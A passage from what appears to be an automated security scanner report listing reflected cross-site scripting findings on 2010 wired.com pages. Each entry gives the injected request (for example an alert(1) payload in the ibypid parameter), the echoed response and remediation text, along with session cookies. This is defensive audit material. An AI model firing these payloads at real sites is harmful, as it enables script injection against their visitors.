Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29403
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:19:03 GMT
Date: Sun, 21 Nov 2010 23:09:03 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_gaming ss_hardware511f3"><a>a929ebce08d">
...[SNIP]...

1.153. http://www.wired.com/gaming/virtualworlds [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /gaming/virtualworlds

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bdcfc"><a>0a261e4d294 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /gamingbdcfc"><a>0a261e4d294/virtualworlds HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29413
Vary: Accept-Encoding
Cache-Control: max-age=226
Expires: Sun, 21 Nov 2010 23:12:23 GMT
Date: Sun, 21 Nov 2010 23:08:37 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_gamingbdcfc"><a>0a261e4d294 ss_virtualworlds">
...[SNIP]...

1.154. http://www.wired.com/gaming/virtualworlds [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /gaming/virtualworlds

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 97bbd"><a>49da4046a0e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /gaming/virtualworlds97bbd"><a>49da4046a0e HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29413
Vary: Accept-Encoding
Cache-Control: max-age=575
Expires: Sun, 21 Nov 2010 23:18:45 GMT
Date: Sun, 21 Nov 2010 23:09:10 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_gaming ss_virtualworlds97bbd"><a>49da4046a0e">
...[SNIP]...

1.155. http://www.wired.com/inspiredbyyou/2010/07/electric-car-grid/ [ibypid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /inspiredbyyou/2010/07/electric-car-grid/

Issue detail

The value of the ibypid request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 96627%3balert(1)//343adadbdb2 was submitted in the ibypid parameter. This input was echoed as 96627;alert(1)//343adadbdb2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /inspiredbyyou/2010/07/electric-car-grid/?ibypid=596627%3balert(1)//343adadbdb2 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/inspiredbyyou/xmlrpc.php
Last-Modified: Sun, 21 Nov 2010 23:14:33 GMT
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=445
Expires: Sun, 21 Nov 2010 23:21:58 GMT
Date: Sun, 21 Nov 2010 23:14:33 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 101588

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<script>var currentNavFrame = 596627;alert(1)//343adadbdb2;</script>
...[SNIP]...

1.156. http://www.wired.com/inspiredbyyou/2010/07/events-calendar [ibypid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /inspiredbyyou/2010/07/events-calendar

Issue detail

The value of the ibypid request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 31876%3balert(1)//b8b3883cd7f was submitted in the ibypid parameter. This input was echoed as 31876;alert(1)//b8b3883cd7f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /inspiredbyyou/2010/07/events-calendar?ibypid=231876%3balert(1)//b8b3883cd7f HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/inspiredbyyou/xmlrpc.php
Last-Modified: Sun, 21 Nov 2010 23:14:13 GMT
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=480
Expires: Sun, 21 Nov 2010 23:22:13 GMT
Date: Sun, 21 Nov 2010 23:14:13 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 101948

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<script>var currentNavFrame = 231876;alert(1)//b8b3883cd7f;</script>
...[SNIP]...

1.157. http://www.wired.com/inspiredbyyou/2010/07/must-sees/ [ibypid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /inspiredbyyou/2010/07/must-sees/

Issue detail

The value of the ibypid request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 53f8c%3balert(1)//63f97596e7a was submitted in the ibypid parameter. This input was echoed as 53f8c;alert(1)//63f97596e7a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /inspiredbyyou/2010/07/must-sees/?ibypid=453f8c%3balert(1)//63f97596e7a HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/inspiredbyyou/xmlrpc.php
Last-Modified: Sun, 21 Nov 2010 23:14:18 GMT
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=480
Expires: Sun, 21 Nov 2010 23:22:18 GMT
Date: Sun, 21 Nov 2010 23:14:18 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 103981

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<script>var currentNavFrame = 453f8c;alert(1)//63f97596e7a;</script>
...[SNIP]...

1.158. http://www.wired.com/inspiredbyyou/2010/07/the-list [ibypid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /inspiredbyyou/2010/07/the-list

Issue detail

The value of the ibypid request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 985e3%3balert(1)//29173f1a6e4 was submitted in the ibypid parameter. This input was echoed as 985e3;alert(1)//29173f1a6e4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /inspiredbyyou/2010/07/the-list?ibypid=3985e3%3balert(1)//29173f1a6e4 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/inspiredbyyou/xmlrpc.php
Last-Modified: Sun, 21 Nov 2010 23:14:17 GMT
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=480
Expires: Sun, 21 Nov 2010 23:22:17 GMT
Date: Sun, 21 Nov 2010 23:14:17 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 104027

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<script>var currentNavFrame = 3985e3;alert(1)//29173f1a6e4;</script>
...[SNIP]...

1.159. http://www.wired.com/inspiredbyyou/2010/07/tweetcarts [ibypid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /inspiredbyyou/2010/07/tweetcarts

Issue detail

The value of the ibypid request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 9281f%3balert(1)//1442148a2f4 was submitted in the ibypid parameter. This input was echoed as 9281f;alert(1)//1442148a2f4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /inspiredbyyou/2010/07/tweetcarts?ibypid=19281f%3balert(1)//1442148a2f4 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/inspiredbyyou/xmlrpc.php
Last-Modified: Sun, 21 Nov 2010 23:14:09 GMT
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=447
Expires: Sun, 21 Nov 2010 23:21:37 GMT
Date: Sun, 21 Nov 2010 23:14:10 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 102331

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<script>var currentNavFrame = 19281f;alert(1)//1442148a2f4;</script>
...[SNIP]...

1.160. http://www.wired.com/inspiredbyyou/2010/08/english-japanese-emoticon-translator/ [ibypid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /inspiredbyyou/2010/08/english-japanese-emoticon-translator/

Issue detail

The value of the ibypid request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload a7a08%3balert(1)//72fe6adb542 was submitted in the ibypid parameter. This input was echoed as a7a08;alert(1)//72fe6adb542 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /inspiredbyyou/2010/08/english-japanese-emoticon-translator/?ibypid=6a7a08%3balert(1)//72fe6adb542 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/inspiredbyyou/xmlrpc.php
Last-Modified: Sun, 21 Nov 2010 23:14:28 GMT
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=446
Expires: Sun, 21 Nov 2010 23:21:55 GMT
Date: Sun, 21 Nov 2010 23:14:29 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 109190

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<script>var currentNavFrame = 6a7a08;alert(1)//72fe6adb542;</script>
...[SNIP]...

1.161. http://www.wired.com/inspiredbyyou/2010/08/top-ten-most-popular-celebrities/ [ibypid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /inspiredbyyou/2010/08/top-ten-most-popular-celebrities/

Issue detail

The value of the ibypid request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 67c96%3balert(1)//9c87be7eadf was submitted in the ibypid parameter. This input was echoed as 67c96;alert(1)//9c87be7eadf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /inspiredbyyou/2010/08/top-ten-most-popular-celebrities/?ibypid=767c96%3balert(1)//9c87be7eadf HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/inspiredbyyou/xmlrpc.php
Last-Modified: Sun, 21 Nov 2010 23:14:24 GMT
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=480
Expires: Sun, 21 Nov 2010 23:22:24 GMT
Date: Sun, 21 Nov 2010 23:14:24 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 107186

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<script>var currentNavFrame = 767c96;alert(1)//9c87be7eadf;</script>
...[SNIP]...

1.162. http://www.wired.com/inspiredbyyou/2010/09/ascent-of-robot/ [ibypid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /inspiredbyyou/2010/09/ascent-of-robot/

Issue detail

The value of the ibypid request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload f56c8%3balert(1)//bb7f19b9979 was submitted in the ibypid parameter. This input was echoed as f56c8;alert(1)//bb7f19b9979 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /inspiredbyyou/2010/09/ascent-of-robot/?ibypid=9f56c8%3balert(1)//bb7f19b9979 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/inspiredbyyou/xmlrpc.php
Last-Modified: Sun, 21 Nov 2010 23:14:39 GMT
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=480
Expires: Sun, 21 Nov 2010 23:22:39 GMT
Date: Sun, 21 Nov 2010 23:14:39 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 105063

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<script>var currentNavFrame = 9f56c8;alert(1)//bb7f19b9979;</script>
...[SNIP]...

1.163. http://www.wired.com/inspiredbyyou/2010/09/bittorrent-or-box-office/ [ibypid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /inspiredbyyou/2010/09/bittorrent-or-box-office/

Issue detail

The value of the ibypid request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload c43e3%3balert(1)//d95607fec28 was submitted in the ibypid parameter. This input was echoed as c43e3;alert(1)//d95607fec28 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /inspiredbyyou/2010/09/bittorrent-or-box-office/?ibypid=11c43e3%3balert(1)//d95607fec28 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/inspiredbyyou/xmlrpc.php
Last-Modified: Sun, 21 Nov 2010 23:14:35 GMT
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=449
Expires: Sun, 21 Nov 2010 23:22:04 GMT
Date: Sun, 21 Nov 2010 23:14:35 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 107877

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<script>var currentNavFrame = 11c43e3;alert(1)//d95607fec28;</script>
...[SNIP]...

1.164. http://www.wired.com/inspiredbyyou/2010/09/re-animators/ [ibypid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /inspiredbyyou/2010/09/re-animators/

Issue detail

The value of the ibypid request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 1b488%3balert(1)//92eb5cb2444 was submitted in the ibypid parameter. This input was echoed as 1b488;alert(1)//92eb5cb2444 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /inspiredbyyou/2010/09/re-animators/?ibypid=101b488%3balert(1)//92eb5cb2444 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/inspiredbyyou/xmlrpc.php
Last-Modified: Sun, 21 Nov 2010 23:14:39 GMT
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=467
Expires: Sun, 21 Nov 2010 23:22:26 GMT
Date: Sun, 21 Nov 2010 23:14:39 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 110658

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<script>var currentNavFrame = 101b488;alert(1)//92eb5cb2444;</script>
...[SNIP]...

1.165. http://www.wired.com/inspiredbyyou/2010/09/the-molecular-pantry/ [ibypid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /inspiredbyyou/2010/09/the-molecular-pantry/

Issue detail

The value of the ibypid request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 8030b%3balert(1)//54f8fbfd62 was submitted in the ibypid parameter. This input was echoed as 8030b;alert(1)//54f8fbfd62 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /inspiredbyyou/2010/09/the-molecular-pantry/?ibypid=88030b%3balert(1)//54f8fbfd62 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/inspiredbyyou/xmlrpc.php
Last-Modified: Sun, 21 Nov 2010 23:14:35 GMT
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=480
Expires: Sun, 21 Nov 2010 23:22:35 GMT
Date: Sun, 21 Nov 2010 23:14:35 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 104883

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<script>var currentNavFrame = 88030b;alert(1)//54f8fbfd62;</script>
...[SNIP]...

1.166. http://www.wired.com/inspiredbyyou/2010/10/buy-it-or-burn-it [ibypid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /inspiredbyyou/2010/10/buy-it-or-burn-it

Issue detail

